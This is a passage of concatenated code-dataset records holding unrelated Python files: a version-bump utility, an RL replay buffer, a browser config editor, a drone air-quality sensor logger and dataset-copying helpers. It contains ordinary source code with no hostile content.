new_content.append(line)\n if file_bumped:\n path.write_text(''.join(new_content))\n return file_bumped\n\n\ndef bump_project(project: Root, old: str, new: str) -> Iterator[Path]:\n for package in project.packages:\n for path in package:\n if path.name not in FILE_NAMES:\n continue\n file_bumped = bump_file(path=path, old=old, new=new)\n if file_bumped:\n yield path\n\n\ndef bump_version(version: Union[Version, str], rule: str, scheme: str = 'semver') -> str:\n # check scheme\n if scheme not in constants.VERSION_SCHEMES:\n raise ValueError('invalid scheme: {}'.format(scheme))\n\n if rule == 'init':\n return constants.VERSION_INIT[scheme]\n\n # explicitly specified local version\n if rule[0] == '+':\n if 'local' not in constants.VERSION_SCHEMES[scheme]:\n raise ValueError('local numbers are unsupported by scheme ' + scheme)\n version = str(version).split('+')[0]\n return version + rule\n\n # check rule\n if rule not in constants.VERSION_SCHEMES[scheme]:\n if REX_VERSION.fullmatch(rule):\n return rule\n raise ValueError('rule {} is unsupported by scheme {}'.format(rule, scheme))\n\n if scheme == 'roman':\n version = roman2arabic(version)\n return arabic2roman(version + 1)\n\n if isinstance(version, str):\n version = Version(version)\n\n if scheme in ('semver', 'romver', 'pep', 'zerover'):\n parts = version.release + (0, 0)\n if scheme == 'zerover':\n parts = (0, ) + parts[1:]\n if rule in constants.VERSION_MAJOR:\n return '{}.0.0'.format(parts[0] + 1)\n if rule in constants.VERSION_MINOR:\n return '{}.{}.0'.format(parts[0], parts[1] + 1)\n if rule in constants.VERSION_PATCH:\n return '{}.{}.{}'.format(parts[0], parts[1], parts[2] + 1)\n\n if scheme in ('semver', 'romver', 'zerover'):\n if rule in constants.VERSION_PRE:\n pre = version.pre[1] if version.pre else 0\n return '{}.{}.{}-rc.{}'.format(*parts[:3], pre + 1)\n if rule in constants.VERSION_LOCAL:\n pre = '-{}.{}'.format(*version.pre) if version.pre else ''\n local = int(version.local) if version.local else 0\n return '{}.{}.{}{}+{}'.format(*parts[:3], pre, local + 1)\n\n if scheme == 'pep':\n if rule in constants.VERSION_PRE:\n pre = version.pre[1] if version.pre else 0\n return '{}.{}.{}rc{}'.format(*parts[:3], pre + 1)\n if rule in constants.VERSION_POST:\n # PEP allows post-releases for pre-releases,\n # but it \"strongly discouraged\", so let's ignore it.\n return '{}.{}.{}.post{}'.format(*parts[:3], (version.post or 0) + 1)\n if rule in constants.VERSION_DEV:\n if version.pre:\n suffix = 'rc{}'.format(version.pre[1])\n elif version.post:\n suffix = '.post{}'.format(version.post)\n else:\n suffix = ''\n return '{}.{}.{}{}.dev{}'.format(*parts[:3], suffix, (version.dev or 0) + 1)\n if rule in constants.VERSION_LOCAL:\n old = str(version).split('+')[0]\n local = int(version.local) if version.local else 0\n return '{}+{}'.format(old, local + 1)\n\n if scheme == 'comver':\n parts = parts = version.release + (0,)\n if rule in constants.VERSION_MAJOR:\n return '{}.0'.format(parts[0] + 1)\n if rule in constants.VERSION_MINOR:\n return '{}.{}'.format(parts[0], parts[1] + 1)\n if rule in constants.VERSION_PRE:\n pre = version.pre[1] if version.pre else 0\n return '{}.{}-rc.{}'.format(*parts[:2], pre + 1)\n if rule in constants.VERSION_LOCAL:\n pre = '-{}.{}'.format(*version.pre) if version.pre else ''\n local = int(version.local) if version.local else 0\n return '{}.{}{}+{}'.format(*parts[:2], pre, local + 1)\n\n if scheme == 'calver':\n today = date.today()\n if rule in constants.VERSION_MAJOR:\n return '{}.{}'.format(today.year, today.month)\n if rule in constants.VERSION_PATCH:\n if version.release[0] == today.year and version.release[1] == today.month:\n micro = (version.release + (0, 0))[2]\n micro = today.day if micro < today.day else micro + 1\n else:\n micro = today.day\n return '{}.{}.{}'.format(today.year, today.month, micro)\n","sub_path":"dephell/actions/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"584261815","text":"\"\"\"\nData structure for implementing experience replay\n\"\"\"\nimport random\nimport numpy as np\n\n\nclass Buffer(object):\n\n def __init__(self, buffer_size, terminal_buffer_size, state_dim, action_dim, reward_dim, random_seed=123):\n \"\"\"\n The right side of the deque contains the most recent experiences\n \"\"\"\n self.buffer_size = buffer_size\n self.terminal_buffer_size = terminal_buffer_size\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.reward_dim = reward_dim\n self.count = 0\n self.terminal_count = 0\n self.test_count = 0\n self.database = np.array(([[]]))\n self.database_ter = np.array(([[]]))\n self.buffer = np.array(([[]]))\n self.terminal_buffer = np.array(([[]]))\n# self.test_buffer = np.array(([[]]))\n random.seed(random_seed)\n\n def data_add(self, args):\n experience = args\n if len(self.database[0]) == 0:\n self.database = experience\n else:\n self.database = np.concatenate((self.database, experience))\n\n\n def data_ter_add(self, args):\n experience = args\n if len(self.database_ter[0]) == 0:\n self.database_ter = np.array([experience])\n else:\n self.database_ter = np.concatenate((self.database_ter, np.array([experience])))\n\n def add(self, args):\n experience = args\n if self.count < self.buffer_size:\n if len(self.buffer[0]) == 0:\n self.buffer = experience\n else:\n self.buffer = np.concatenate((self.buffer, experience))\n\n self.count += 1\n\n else:\n self.buffer = np.delete(self.buffer, 0, 0)\n self.buffer = np.concatenate((self.buffer, experience))\n\n def terminal_add(self, args):\n experience = args\n if self.terminal_count < self.terminal_buffer_size:\n if len(self.terminal_buffer[0]) == 0:\n self.terminal_buffer = np.array([experience])\n else:\n self.terminal_buffer = np.concatenate((self.terminal_buffer, np.array([experience])))\n\n self.terminal_count += 1\n else:\n self.terminal_buffer = np.delete(self.terminal_buffer, 0, 0)\n self.terminal_buffer = np.concatenate((self.termianl_buffer, [experience]))\n\n def size(self):\n return self.count\n\n def terminal_size(self):\n return self.terminal_count\n\n def Make_buffer(self, number):\n if len(self.database) < number:\n sampled = self.database\n else:\n sampled = np.array(random.sample(list(self.database), number))\n self.add(sampled)\n\n def Make_buffer_ter(self, number):\n sampled = np.array(random.sample(list(self.database_ter), number))\n self.terminal_add(sampled)\n\n def sample_batch(self, batch_size):\n batch = []\n self.count = len(self.buffer)\n if self.count < batch_size:\n batch = random.sample(list(self.buffer), self.count)\n else:\n batch = random.sample(list(self.buffer), batch_size)\n\n s_batch = np.array([i[0:self.state_dim] for i in batch])\n a_batch = np.array([i[self.state_dim:self.state_dim+self.action_dim] for i in batch])\n r_batch = np.array([i[self.state_dim+self.action_dim:self.state_dim+self.action_dim+self.reward_dim] for i in batch])\n ss_batch = np.array([i[self.state_dim+self.action_dim+self.reward_dim:2*self.state_dim+self.action_dim+self.reward_dim] for i in batch])\n return s_batch, a_batch, r_batch , ss_batch\n\n def sample_terminal_batch(self, terminal_batch_size):\n if self.terminal_count < terminal_batch_size:\n terminal_batch = random.sample(list(self.terminal_buffer), self.terminal_count)\n else:\n terminal_batch = random.sample(list(self.terminal_buffer), terminal_batch_size)\n\n st_batch = np.array([i[0:self.state_dim] for i in terminal_batch])\n at_batch = np.array([i[self.state_dim:self.state_dim+self.action_dim] for i in terminal_batch])\n rt_batch = np.array([i[self.state_dim+self.action_dim:self.state_dim+self.action_dim+self.reward_dim] for i in terminal_batch])\n sst_batch = np.array([i[self.state_dim+self.action_dim+self.reward_dim:2*self.state_dim+self.action_dim+self.reward_dim] for i in terminal_batch])\n return st_batch, at_batch, rt_batch, sst_batch\n\n","sub_path":"intro/SNU-DQN/Buffer.py","file_name":"Buffer.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"475800690","text":"street=[list(map(int,input().split())) for _ in range(int(input()))]\n\nn=0\navg=sum(street[i][1] for i in range(len(street)))/2\n\nfor p,q in sorted(street, key=lambda x:x[0]):\n n+=q\n if n>=avg:\n print(p)\n break\n","sub_path":"2141_Office.py","file_name":"2141_Office.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"450919294","text":"\ndef make_dropdown(init_value, choices, callback):\n\ta = html.A(init_value, **{'class':'dropdown-toggle', 'data-toggle':'dropdown', \n\t\t\t\t\t\t\t\t'aria-haspopup':'true', 'aria-expanded':'false', \n\t\t\t\t\t\t\t\t'id':'config_editor_select_id_1'})\n\tll = html.DIV(**{'class':'dropdown-menu', 'aria-labelledby':'config_editor_select_id_1'})\n\tdropdown = html.TD(a + ll, **{'class':'dropdown'})\n\tfor c in choices:\n\t\tli = html.A(c, **{'class':'dropdown-item small'})\n\t\tll <= li\n\t\tdef on_click(ev):\n\t\t\ta.text = ev.target.text\n\t\t\tcallback(ev.target.text)\n\t\tli.bind('click', on_click)\n\treturn dropdown\n\nclass config_editor_obj:\n\tdef __init__(self):\n\t\tself.type_name = 'config_editor'\n\t\tself.elt = html.DIV()\n\t\tself.event_listener = None\n\t\tself.item = None\n\t\tself.item_table = None\n\t\tself.config_names = []\n\t\tself.item_name = ''\n\t\tself.key_column = 0\n\t\tself.config_column = None\n\t\tself.options = []\n\t\tself.del_btn = None\n\n\tdef mounted(self, config, is_editing, edit_listener):\n\t\tif 'attr' in config:\n\t\t\tattr = config['attr']\n\t\t\tif 'config_names' in attr:\n\t\t\t\tself.config_names = attr['config_names'].split(',')\n\t\t\tif 'item_name' in attr:\n\t\t\t\tself.item_name = attr['item_name']\n\t\t\tif 'key_column' in attr:\n\t\t\t\ttry:\n\t\t\t\t\tself.key_column = int(attr['key_column'])\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tif 'config_column' in attr:\n\t\t\t\ttry:\n\t\t\t\t\tself.config_column = int(attr['config_column'])\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tif 'options' in attr:\n\t\t\t\tself.options = attr['options'].strip().split(';')\n\t\t\t\tself.options = [[o.strip() for o in options.strip().split(',') if o.strip() != ''] for options in self.options]\n\t\t\twhile len(self.options) < len(self.config_names):\n\t\t\t\tself.options.append([])\n\n\n\tdef use_example_data(self):\n\t\tself.item = {'rows':[['名称1']]}\n\t\tself.set_data(None, self.item)\n\n\tdef get_data(self, data_name):\n\t\treturn self.item\n\n\tdef set_data(self, data_name, data):\n\t\tself.item = None\n\t\tself.elt.clear()\n\t\tif data is None: return\n\t\tself.item = data\n\t\trow = self.item['rows'][0]\n\t\ttb = html.TABLE(**{'class':'small table table-sm table-hover'})\n\t\tself.elt <= tb\n\t\tthead = html.THEAD(**{'class':'thead-dark'})\n\t\ttb <= thead\n\t\ttbody = html.TBODY()\n\t\ttb <= tbody\n\t\ttr = html.TR()\n\t\tthead <= tr\n\t\ttr <= html.TH()\n\t\ttr <= html.TH(self.item_name+'参数')\n\t\ttr <= html.TH('值')\n\t\t# name\n\t\ta1 = html.A(row[self.key_column], **{'contenteditable':'true'})\n\t\ttr = html.TR(**{'class':'table-info'})\n\t\ttbody <= tr\n\t\ttr <= html.TD()\n\t\ttr <= html.TD(self.item_name+'名称')\n\t\ttr <= html.TD(a1)\n\t\tdef onblur1(ev):\n\t\t\tnonlocal a1\n\t\t\ttext = a1.text.strip()\n\t\t\tif text != row[self.key_column]:\n\t\t\t\trow[self.key_column] = text\n\t\t\t\tself.del_btn.text = '删除'+self.item_name+' \"'+text+'\"'\n\t\t\t\tif self.event_listener is not None:\n\t\t\t\t\tself.event_listener('change', 'item')\t\n\t\ta1.bind('blur', onblur1)\n\t\t# configs\n\t\tif len(self.config_names) > 0 and self.config_column is not None and self.config_column < len(row):\n\t\t\ttexts = row[self.config_column].split(',')\n\t\t\twhile len(texts) < len(self.config_names):\n\t\t\t\ttexts.append('')\n\t\t\tdef make_td(i):\n\t\t\t\tif len(self.options[i]) > 0:\n\t\t\t\t\tdef callback(option):\n\t\t\t\t\t\tnonlocal texts\n\t\t\t\t\t\tif texts[i] == option: return\n\t\t\t\t\t\ttexts[i] = option\n\t\t\t\t\t\trow[self.config_column] = ','.join(texts)\n\t\t\t\t\t\tif self.event_listener is not None:\n\t\t\t\t\t\t\tself.event_listener('change', 'item')\n\t\t\t\t\treturn make_dropdown(texts[i], self.options[i], callback)\n\t\t\t\telse:\n\t\t\t\t\ta2 = html.A(texts[i], **{'contenteditable':'true'})\n\t\t\t\t\tdef onblur2(ev):\n\t\t\t\t\t\tnonlocal texts\n\t\t\t\t\t\ttext = a2.text.strip()\n\t\t\t\t\t\tif texts[i] == text: return \n\t\t\t\t\t\ttexts[i] = text\n\t\t\t\t\t\trow[self.config_column] = ','.join(texts)\n\t\t\t\t\t\tif self.event_listener is not None:\n\t\t\t\t\t\t\tself.event_listener('change', 'item')\n\t\t\t\t\ta2.bind('blur', onblur2)\n\t\t\t\t\treturn html.TD(a2)\t\n\t\t\tfor i,config_name in enumerate(self.config_names):\n\t\t\t\ttr = html.TR(**{'class':'table-info'})\n\t\t\t\ttbody <= tr\n\t\t\t\tconfig_name = config_name.split(':')\n\t\t\t\tif len(config_name) == 1:\n\t\t\t\t\ttr <= html.TD()\n\t\t\t\t\ttr <= html.TD(config_name[0])\n\t\t\t\telse:\n\t\t\t\t\ttr <= html.TD(html.SPAN(config_name[0], **{'class':'badge badge-info'}))\n\t\t\t\t\ttr <= html.TD(config_name[1])\n\t\t\t\ttr <= make_td(i)\n\t\t# delete item\n\t\ttr = html.TR(**{'class':'table-info'})\n\t\ttbody <= tr\n\t\ttr <= html.TD()\n\t\ttr <= html.TD()\n\t\ttd = html.TD()\n\t\ttr <= td\n\t\tself.del_btn = html.BUTTON('删除'+self.item_name+' \"'+row[self.key_column]+'\"', style={'font-size':'smaller'}, **{'type':'button', 'class':'btn-sm btn-dark'})\n\t\ttd <= self.del_btn\n\t\tdef delete_item(ev):\n\t\t\tself.set_data(None, None)\n\t\t\tself.event_listener('change', 'item')\n\t\tdef confirm_delete_item(ev):\n\t\t\tfrom browser import self as window\n\t\t\twindow.confirm_modal('请确认删除'+self.item_name+': ' + row[self.key_column], delete_item)\n\t\tself.del_btn.bind('click', confirm_delete_item)\n\n","sub_path":"HW_2020_09/web/user_data/ui/config_editor.py","file_name":"config_editor.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"576694768","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\nimport time\nimport matplotlib.pyplot as plt\nfrom subprocess import call\nfrom logger import Logger\nfrom ADS1115 import ADS1115\nfrom SDS011 import SDS011\n\n# Utility function to write headers of the output files\ndef write_file_headers():\n # print raw files headers\n # txt file\n txtraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.txt','w')\n txtraw.write('%r %r %r %r %r %r %r %r %r \\n' % ('time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'WE_NO2 [mV] ', 'AE_NO2 [mV] ', 'WE_CO [mV] ', 'AE_CO [mV]', 'data', 'ora'))\n txtraw.close()\n # csv file\n csvraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.csv','w', newline = '')\n csvraw_writer = csv.writer(csvraw, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csvraw_writer.writerow(['time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'WE_NO2 [mV] ', 'AE_NO2 [mV] ', 'WE_CO [mV] ', 'AE_CO [mV]', 'data', 'ora'])\n csvraw.close()\n \n # print processed files headers\n # txt file\n txtProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.txt','w')\n txtProc.write('%r %r %r %r %r %r %r %r %r \\n' % ('time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'NO2 [ug/m3] ', 'CO [ug/m3] ', '/', '/', 'data', 'ora'))\n txtProc.close()\n # csv file\n csvProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.csv','w', newline = '')\n csvProc_writer = csv.writer(csvProc, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csvProc_writer.writerow(['time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'NO2 [ug/m3] ', 'CO [ug/m3] ', '/', '/', 'data', 'ora'])\n csvProc.close()\n\nif __name__ == '__main__':\n\n dataname = time.strftime('%d_%m_%Y_%H_%M_%S') # current date and time to name the files\n sys.stdout = Logger(dataname) # to both show stdout in the console and also save it in a log file\n \n print('ARIA data acquisition')\n print('Serial numbers:')\n print('NO2: 212890332')\n print('CO: 132420228')\n \n## val = input('Type y to confirm serial numbers match: ')\n## if val != 'y':\n## exit(\"Wrong sensors\")\n\n # values for sensor NO2 serial number 212890332\n WE_e_NO2 = 300\n AE_e_NO2 = 305\n sens_NO2 = 0.218\n n_NO2 = 1.9\n\n # values for sensor CO serial number 132420228\n WE_e_CO = 272\n AE_e_CO = 258\n sens_CO = 0.252\n n_CO = -1.5\n \n print('Sensors init')\n part_sensor = SDS011('/dev/ttyUSB0')\n gas_sensor = ADS1115()\n \n print('Read single sample')\n pm25, pm10, tempo = part_sensor.get_data()\n gas = gas_sensor.get_data() \n print(pm25, pm10, gas[0], gas[1], gas[2], gas[3]) # gas[0] = WE_NO2, gas[1] = AE_NO2, gas[2] = WE_CO, gas[3] = AE_CO\n \n print('Init plotting')\n plt.ion()\n fig, ax = plt.subplots(5,1)\n\n # initialize data structures for plots\n BUFF_LEN = 60 # dimension of the buffer which holds the sensor data\n x = []\n y0 = []\n y1 = []\n y2 = []\n y3 = []\n y4 = []\n y5 = []\n l0 = l1 = l2 = l3 = l4 = l5 = None\n \n n = 0 # iteration counter\n\n # Write headers of the raw and processed output files\n write_file_headers()\n\n print('Enter acquisition loop')\n\n # Start time count\n start_time = time.time()\n\n # Read mavlink_time_linker output\n pixhawk_time_file = open('pixhawk_time.txt', 'r')\n pixhawk_time = pixhawk_time_file.read()\n print('pixhawk time = ' + pixhawk_time)\n pixhawk_time_file.close()\n \n while True:\n \n time_elapsed = time.time() - start_time\n\n print(\"Time elapsed: \" + str(time_elapsed))\n \n # get data from sensors\n pm25, pm10, tempo = part_sensor.get_data()\n gas = gas_sensor.get_data()\n \n print(\"pm25 pm10 WE_NO2 AE_NO2 WE_CO AE_CO\") \n \n print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gas[0], gas[1], gas[2], gas[3]), \" valori misurati\")\n\n # Write raw data to txt\n txtraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.txt','a')\n txtraw.write('%r %r %r %r %r %r %r %r %r \\n' % (time_elapsed, pm25, pm10, gas[0], gas[1], gas[2], gas[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')))\n txtraw.close()\n\n # Write raw data to csv\n csvraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.csv','a', newline = '')\n csvraw_writer = csv.writer(csvraw, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csvraw_writer.writerow([time_elapsed, pm25, pm10, gas[0], gas[1], gas[2], gas[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')])\n csvraw.close()\n\n # Here convert raw ADC data to eng. values\n # from ug/m3 to ppb \n\n gaspic = [0,0,0,0];\n gaspic[0] = (((gas[0] - WE_e_NO2) - (n_NO2 * (gas[1] - AE_e_NO2))) / (sens_NO2)) # NO2 sensor\n gaspic[1] = (((gas[2] - WE_e_CO)-( n_CO*(gas[3] - AE_e_CO)))/ (sens_CO)) # CO sensor\n gaspic[2] = 0.0 # (gas[2] - 260)/ 0.369 # NO2 sensor\n gaspic[3] = 0.0 # gas[3]*4.1569 - 1269.6 # PID ( VOCs )\n \n print(\"pm25 pm10 NO2 CO NO VOCs\") \n print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gaspic[0], gaspic[1], gaspic[2], gaspic[3]),\" valori grafico (ppb) (pm in ug/m^3 e VOCs in mV)\")\n \n # convert from ppb to ug/m^3\n gasmicro = [0,0,0,0];\n gasmicro[0]= gaspic[0] * 1.88 #NO2\n gasmicro[1]= gaspic[1] * 1.145 #CO\n gasmicro[2]= gaspic[2] * 1.45 #NO (== 0)\n gasmicro[3]= gaspic[3] #VOCs (== 0)\n\n # Write processed data to txt\n print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gas[0], gas[1], gas[2], gas[3]), \" valori misurati\")\n txtProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.txt','a')\n txtProc.write('%r %r %r %r %r %r %r %r %r \\n' % (time_elapsed, pm25, pm10, gasmicro[0], gasmicro[1], gasmicro[2], gasmicro[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')))\n txtProc.close()\n\n # Write processed data to csv\n csvProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.csv','a', newline = '')\n csvProc_writer = csv.writer(csvProc, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csvProc_writer.writerow([time_elapsed, pm25, pm10, gasmicro[0], gasmicro[1], gasmicro[2], gasmicro[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')])\n csvProc.close()\n\n print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gasmicro[0], gasmicro[1], gasmicro[2], gasmicro[3]),\" valori grafico (migrogrammi/m^3) (pm in ug/m^3 e VOCs in mV)\") \n \n print(\"\\n\")\n\n # Plot in console\n # Store into the queues\n x.append(time_elapsed)\n y0.append(pm25)\n y1.append(pm10)\n y2.append(gasmicro[0]) #NO2\n y3.append(gasmicro[1]) #CO\n y4.append(gaspic[2]) #NO\n y5.append(gaspic[3]) #VOCs\n if len(x) > BUFF_LEN: # keep only the latest 60 elements\n x = x[-BUFF_LEN:]\n y0 = y0[-BUFF_LEN:]\n y1 = y1[-BUFF_LEN:]\n y2 = y2[-BUFF_LEN:]\n y3 = y3[-BUFF_LEN:]\n y4 = y4[-BUFF_LEN:]\n y5 = y5[-BUFF_LEN:]\n\n # Plot\n if n == 0:\n l0, = ax[0].plot(x, y0,'-*', alpha=0.8) # pm2.5\n l1, = ax[0].plot(x, y1, 'y-s', alpha=0.8) # pm10\n l2, = ax[1].plot(x, y2, 'r-o', alpha=0.8) # NO2\n l3, = ax[2].plot(x, y3, 'g-o', alpha=0.8) # CO\n l4, = ax[3].plot(x, y4, 'c-*', alpha=0.8) # NO\n l5, = ax[4].plot(x, y5, 'k-*', alpha=0.8) # VOCs\n else:\n l0.set_data(x, y0)\n ax[0].relim()\n ax[0].autoscale_view()\n ax[0].set_ylabel('pm [ug]')\n l1.set_data(x, y1)\n ax[0].relim()\n ax[0].autoscale_view()\n ax[0].legend(( l0, l1),('pm 2.5','pm 10'))\n l2.set_data(x, y2)\n ax[1].relim()\n ax[1].autoscale_view()\n ax[1].set_ylabel(' NO2 [ug/m3] ')\n l3.set_data(x, y3)\n ax[2].relim()\n ax[2].autoscale_view()\n ax[2].set_ylabel(' CO [ug/m3] ')\n l4.set_data(x, y4)\n ax[3].relim()\n ax[3].autoscale_view()\n ax[3].set_ylabel(' NO [ppb] ')\n l5.set_data(x, y5)\n ax[4].relim()\n ax[4].autoscale_view()\n ax[4].set_ylabel(' VOCs [mV] ')\n\n n = n + 1\n \n plt.draw()\n plt.xlabel('time s')\n \n plt.pause(1.0)\n\n # Wait 1 sec before acquiring next data point\n time.sleep(1.0)","sub_path":"aria.py","file_name":"aria.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"345557483","text":"import json\nimport os\nimport shutil\nimport warnings\nfrom glob import glob\n\nfrom pybdv.metadata import get_data_path, get_bdv_format\nfrom ..xml_utils import copy_xml_with_newpath\n\n\ndef _load_datasets(path):\n try:\n with open(path) as f:\n datasets = json.load(f)\n except (FileNotFoundError, ValueError):\n datasets = {}\n datasets['datasets'] = []\n return datasets\n\n\ndef have_dataset(root, dataset_name):\n path = os.path.join(root, 'datasets.json')\n datasets = _load_datasets(path)\n return dataset_name in datasets['datasets']\n\n\ndef add_dataset(root, dataset_name, is_default):\n path = os.path.join(root, 'datasets.json')\n datasets = _load_datasets(path)\n\n if dataset_name in datasets['datasets']:\n warnings.warn(f\"Dataset {dataset_name} is already present!\")\n else:\n datasets['datasets'].append(dataset_name)\n\n # if this is the only dataset we set it as default\n if is_default or len(datasets) == 1:\n datasets['defaultDataset'] = dataset_name\n\n with open(path, 'w') as f:\n json.dump(datasets, f, sort_keys=True, indent=2)\n\n\ndef get_datasets(root):\n path = os.path.join(root, 'datasets.json')\n datasets = _load_datasets(path)\n return datasets['datasets']\n\n\n#\n# functionalty to copy a dataset folder\n#\n\ndef make_squashed_link(src_file, dst_file, override=False):\n\n if os.path.exists(dst_file):\n if override and os.path.islink(dst_file):\n os.unlink(dst_file)\n elif override and not os.path.islink(dst_file):\n raise RuntimeError(\"Cannot override an actual file!\")\n elif not override:\n return\n\n if os.path.islink(src_file):\n src_file = os.path.realpath(src_file)\n dst_folder = os.path.split(dst_file)[0]\n rel_path = os.path.relpath(src_file, dst_folder)\n os.symlink(rel_path, dst_file)\n\n\ndef copy_xml_file(xml_in, xml_out, storage='local'):\n if storage == 'local':\n data_path = get_data_path(xml_in, return_absolute_path=True)\n bdv_format = get_bdv_format(xml_in)\n xml_dir = os.path.split(xml_out)[0]\n data_path = os.path.relpath(data_path, start=xml_dir)\n copy_xml_with_newpath(xml_in, xml_out, data_path,\n path_type='relative', data_format=bdv_format)\n elif storage == 'remote':\n shutil.copyfile(xml_in, xml_out)\n else:\n raise ValueError(\"Invalid storage spec %s\" % storage)\n\n\ndef copy_image_data(src_folder, dst_folder, exclude_prefixes=[]):\n # load all image properties from the image dict\n image_dict = os.path.join(src_folder, 'images', 'images.json')\n with open(image_dict, 'r') as f:\n image_dict = json.load(f)\n\n for name, properties in image_dict.items():\n type_ = properties['type']\n # don't copy segmentations\n if type_ not in ('image', 'mask'):\n continue\n # check if we exclude this prefix\n prefix = '-'.join(name.split('-')[:4])\n if prefix in exclude_prefixes:\n continue\n # copy the xmls for the different storages\n for storage, relative_xml in properties['storage'].items():\n in_path = os.path.join(src_folder, 'images', relative_xml)\n out_path = os.path.join(dst_folder, 'images', relative_xml)\n # copy the xml\n copy_xml_file(in_path, out_path, storage)\n\n\ndef copy_misc_data(src_folder, dst_folder, copy_misc=None):\n misc_src = os.path.join(src_folder, 'misc')\n misc_dst = os.path.join(dst_folder, 'misc')\n\n # copy the bookmarks\n bookmark_src = os.path.join(misc_src, 'bookmarks')\n bookmark_dst = os.path.join(misc_dst, 'bookmarks')\n\n for bkmrk in glob(os.path.join(bookmark_src, '*.json')):\n bkmrk_out = os.path.join(bookmark_dst, os.path.split(bkmrk)[1])\n shutil.copyfile(bkmrk, bkmrk_out)\n\n # copy the leveling.json file\n leveling_src = os.path.join(misc_src, 'leveling.json')\n if os.path.exists(leveling_src):\n shutil.copyfile(leveling_src, os.path.join(misc_dst, 'leveling.json'))\n\n # copy additional data in the misc folder if copy_misc function is given\n if copy_misc is not None:\n copy_misc(src_folder, dst_folder)\n\n\ndef link_id_lut(src_folder, dst_folder, name):\n # for local storage:\n # make link to the previous id look-up-table (if present)\n lut_name = 'new_id_lut_%s.json' % name\n lut_in = os.path.join(src_folder, 'misc', lut_name)\n if not os.path.exists(lut_in):\n return\n lut_out = os.path.join(dst_folder, 'misc', lut_name)\n if not os.path.exists(lut_out):\n rel_path = os.path.relpath(lut_in, os.path.split(lut_out)[0])\n os.symlink(rel_path, lut_out)\n\n\ndef copy_segmentation(src_folder, dst_folder, name, properties):\n # copy the xmls for the different storages\n for storage, relative_xml in properties['storage'].items():\n in_path = os.path.join(src_folder, 'images', relative_xml)\n out_path = os.path.join(dst_folder, 'images', relative_xml)\n # copy the xml\n copy_xml_file(in_path, out_path, storage)\n # link the id look-up-table\n link_id_lut(src_folder, dst_folder, name)\n\n\ndef copy_segmentations(src_folder, dst_folder, exclude_prefixes=[]):\n # load all image properties from the image dict\n image_dict = os.path.join(src_folder, 'images', 'images.json')\n with open(image_dict, 'r') as f:\n image_dict = json.load(f)\n\n for name, properties in image_dict.items():\n type_ = properties['type']\n # only copy segmentations\n if type_ != 'segmentation':\n continue\n # check if we exclude this prefix\n prefix = '-'.join(name.split('-')[:4])\n if prefix in exclude_prefixes:\n continue\n copy_segmentation(src_folder, dst_folder, name, properties)\n\n\ndef copy_tables(src_folder, dst_folder, table_folder=None):\n if table_folder is None:\n table_in = src_folder\n table_out = dst_folder\n else:\n table_in = os.path.join(src_folder, table_folder)\n table_out = os.path.join(dst_folder, table_folder)\n os.makedirs(table_out, exist_ok=True)\n\n table_files = os.listdir(table_in)\n table_files = [ff for ff in table_files if os.path.splitext(ff)[1] == '.csv']\n\n for ff in table_files:\n src_file = os.path.join(table_in, ff)\n dst_file = os.path.join(table_out, ff)\n make_squashed_link(src_file, dst_file)\n\n\ndef copy_all_tables(src_folder, dst_folder):\n image_dict = os.path.join(src_folder, 'images', 'images.json')\n with open(image_dict) as f:\n image_dict = json.load(f)\n\n for name, properties in image_dict.items():\n table_folder = properties.get('tableFolder', None)\n if table_folder is None:\n continue\n copy_tables(src_folder, dst_folder, table_folder)\n\n\ndef copy_and_check_image_dict(src_folder, dst_folder, exclude_prefixes=[]):\n image_dict_in = os.path.join(src_folder, 'images', 'images.json')\n image_dict_out = os.path.join(dst_folder, 'images', 'images.json')\n with open(image_dict_in) as f:\n image_dict = json.load(f)\n\n # TODO check the image dict, use functionality from\n # mobie.metadata.image_dict.validate...\n\n with open(image_dict_out, 'w') as f:\n json.dump(image_dict, f)\n\n\ndef copy_dataset_folder(src_folder, dst_folder, exclude_prefixes=[], 